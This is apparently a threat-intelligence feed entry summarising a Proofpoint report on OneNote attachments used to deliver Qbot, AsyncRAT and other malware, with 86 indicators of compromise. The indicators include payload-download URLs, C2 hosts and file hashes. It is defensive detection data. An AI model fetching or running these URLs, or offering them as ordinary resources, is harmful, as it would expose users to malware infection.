← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
OneNote Documents Increasingly Used to Deliver Malware | Proofpoint UK
WHITE TA577 sbik_intel 2023-02-01 Modified: 2023-03-03
86
IOCs
HIGH VOLUME
Proofpoint researchers recently identified an increase in threat actor use of OneNote documents to deliver malware via email to unsuspecting end-users in December 2022 and January 2023. OneNote is a digital notebook created by Microsoft and available via the Microsoft 365 product suite. Proofpoint has observed threat actors deliver malware via OneNote documents, which are .one extensions, via email attachments and URLs.
qbotonenotedoublebackasyncratbecquasarxwormasyncrat c2ta577quasar ratagentteslaredlinetoolspowershellquasarrat
MITRE ATT&CK & Malware Families
ATT&CK TECHNIQUES
MALWARE FAMILIES
XWorm Quasar BEC AsyncRAT DOUBLEBACK OneNote Qbot
Indicators of Compromise (86)
All URL domain FileHash-MD5 FileHash-SHA1 FileHash-SHA256 hostname
TYPEINDICATORDESCRIPTIONCREATED
URL http://54.151.95.132/ExcelSheel.vbs 2023-02-01
URL http://54.151.95.132/Access.one 2023-02-01
URL http://3.101.39.145/TPAEROSPACE.one 2023-02-01
URL http://3.101.39.145/Excel.exe 2023-02-01
URL http://files.catbox.moe/rltrtq.bat 2023-02-01
URL http://files.catbox.moe/nvz0g1.ps1 2023-02-01
URL http://transfer.sh/rMitxs/Invoice212.bat 2023-02-01
URL http://transfer.sh/get/p29ViK/tpee.bat 2023-02-01
URL http://transfer.sh/get/cOrt9R/me.bat 2023-02-01
URL http://transfer.sh/get/UaTsxp/Newsharedfilesnow.hta 2023-02-01
URL http://transfer.sh/get/TScdAm/AsyncClient.bat 2023-02-01
URL http://transfer.sh/get/Pcj58k/AsyncClient.bat 2023-02-01
URL http://transfer.sh/get/7msVcM/FRESHME.bat 2023-02-01
URL http://transfer.sh/get/5dLEvB/sky.bat 2023-02-01
URL http://transfer.sh/IGu2K2/INV.bat 2023-02-01
domain direct-trojan.com 2023-02-01
FileHash-MD5 fc54858ae2e48c9dbe562f68107d1928 MD5 of 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a 2023-02-01
FileHash-SHA1 70352ca74fa8d31d6b1779b56c4fb16834d4e4c6 SHA1 of 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a 2023-02-01
FileHash-SHA256 0b0c70ee1612139cf7a83847cca805689aec9fbcc587a7ef8f26aa4fb9e71295 2023-02-01
FileHash-SHA256 0ff4aa2eb1cd681e3b77348af935bcfc56f4b7cae48bcd826000b7ff2b82b671 2023-02-01
FileHash-SHA256 15212428deeeabcd5b11a1b8383c654476a3ea1b19b804e4aca606fac285387f 2023-02-01
FileHash-SHA256 1791dd7a7c7d0688fac3626d57221ada157c57572cf9ed46ad4cab3d28dbaf91 2023-02-01
FileHash-SHA256 222b1a425f75fc7998a0bbabd52277cd82bb5ec50b75f4fb67568b3b754f5406 2023-02-01
FileHash-SHA256 2283c3be89eb6cbf0e1579a6e398a5d1f81a50793fcca22fbc6cbdab53dc2d31 2023-02-01
FileHash-SHA256 328a12fdd6b485362befb392925282451d65aa23482584a49dd5b0e126218df7 2023-02-01
FileHash-SHA256 377fe4e55b6dde063c15c41389f3bb5aacf95443874bdcc0d02a44d6bd793780 2023-02-01
FileHash-SHA256 43f4eaefc6e71f8d30b2e3749475af51ce4d6740546706113cc4785b4410a14c 2023-02-01
FileHash-SHA256 66c045eb61f2e589b1e27db284c9c518e5d0e87dcff25b096eede7047f7dd207 2023-02-01
FileHash-SHA256 6a1bac8fbb30f4b98da7f7ac190fb971bf91d15b41748bc63fd9cbddb96ef189 2023-02-01
FileHash-SHA256 73dc35d1fa8d1e3147a5fe6056e01f89847441ec46175ba60b24a56b7fbdf2f9 2023-02-01
FileHash-SHA256 75819879049e80de6376f146430e63a53fc4291d21f3db930ea872b82d07c77a 2023-02-01
FileHash-SHA256 8276104d8d47def986063b8fbafd82ad5f4cd23862ff9ede1231cefb35115a1b 2023-02-01
FileHash-SHA256 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a 2023-02-01
FileHash-SHA256 a5ae1b866c5d8a7b3eb8427e686cf5d0264b809ed4491b47346542bf69caab65 2023-02-01
FileHash-SHA256 a748f4e526c1a5fed7e57887ef951e451236ee3ad39cf6161d18e5c2230aca0b 2023-02-01
FileHash-SHA256 adb237144a52fc610984bd5ae8501271c5eef8ff49eff0a9d02adf4a5e36ad3b 2023-02-01
FileHash-SHA256 bdc52f8983b7f034e86d1628efab5faf974e8c33ea9c3bcab0fd09ca462f8322 2023-02-01
FileHash-SHA256 c59f95d9c9ff830d33fb73c2a8b0ee8be6619b6823fc23210600b9fa88a8c9d4 2023-02-01
FileHash-SHA256 c8e326756cc1f95ff51ffe26471df16f4131fdbca2ed14f8c8d14e21010058b9 2023-02-01
FileHash-SHA256 de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf 2023-02-01
FileHash-SHA256 dfb8ba6c2ac264ac73f6d2c440d2c0744c043f1d8435bb798fef5380a649fc4e 2023-02-01
FileHash-SHA256 e1d34ad42938a777d80f3ee4c206de14021f13ab79600168b85894fdb0867b3e 2023-02-01
FileHash-SHA256 e2b70c8552b38a6b8722d614254202c346190c6a187984a4450223eb536aaf4b 2023-02-01
FileHash-SHA256 e5a33b42b71f8ac1a5371888d11a0066b49a7f0c25fe74857fa07fb0c9bdff27 2023-02-01
FileHash-SHA256 ef5a7fc0c2a301b57f0723af97faea37374b91eb3b72d8ca6ffc09a095998bb2 2023-02-01
URL ftp://ftp.mgcpakistan.com/ 2023-02-01
URL http://109.107.179.248:80 2023-02-01
URL http://179.43.187.241/Downloads/Newsharedfilesnow.pdf.lnk 2023-02-01
URL http://198.23.172.90/comment.exe 2023-02-01
URL http://198.23.172.90/new.exe 2023-02-01
URL http://198.23.172.90/templa.one 2023-02-01
URL http://198.23.172.90/template.one 2023-02-01
URL http://212.193.30.230:3345 2023-02-01
URL http://barricks.org/admin10/client.php 2023-02-01
URL http://codezian.com/Nt57/300123.gif 2023-02-01
URL http://depotejarat.ir/voicemail.bat 2023-02-01
URL http://direct-trojan.com/file/05df70/remlog.bat 2023-02-01
URL http://direct-trojan.com/file/3c6f73/software-update.exe 2023-02-01
URL http://direct-trojan.com/file/b685b9/New%20Section%201.one 2023-02-01
URL http://kanaskanas.com/fw435tv345t.ps1 2023-02-01
URL http://myvigyan.com/m1YPt/300123.gif 2023-02-01
URL http://onenotegem.com/uploads/soft/one-templates/weekly_assignments.one 2023-02-01
URL http://stnicholaschurch.ca/Cardlock_341121.bat 2023-02-01
URL http://stnicholaschurch.ca/DCyaz.bat 2023-02-01
URL http://stnicholaschurch.ca/Invoice.one 2023-02-01
URL http://stnicholaschurch.ca/xw.bat 2023-02-01
URL http://www.onenotegem.com/uploads/soft/one-templates/four-quadrant.one 2023-02-01
URL http://www.onenotegem.com/uploads/soft/one-templates/notes_to_do_list.one 2023-02-01
URL http://www.onenotegem.com/uploads/soft/one-templates/the_daily_schedule.one 2023-02-01
URL http://zaminkaran.ir/new.png 2023-02-01
domain barricks.org 2023-02-01
domain codezian.com 2023-02-01
domain depotejarat.ir 2023-02-01
domain four-quadrant.one 2023-02-01
domain kanaskanas.com 2023-02-01
domain myvigyan.com 2023-02-01
domain onenotegem.com 2023-02-01
domain stnicholaschurch.ca 2023-02-01
domain zaminkaran.ir 2023-02-01
hostname ftp.mgcpakistan.com 2023-02-01
hostname ghcc.duckdns.org 2023-02-01
hostname newtryex.ddns.net 2023-02-01
hostname plax.duckdns.org 2023-02-01
hostname su1d.nerdpol.ovh 2023-02-01
hostname winery.nsupdate.info 2023-02-01
hostname www.onenotegem.com 2023-02-01
References (1)
↗ https://www.proofpoint.com/uk/blog/threat-insight/onenote-documents-increasingly-used-to-deliver-malware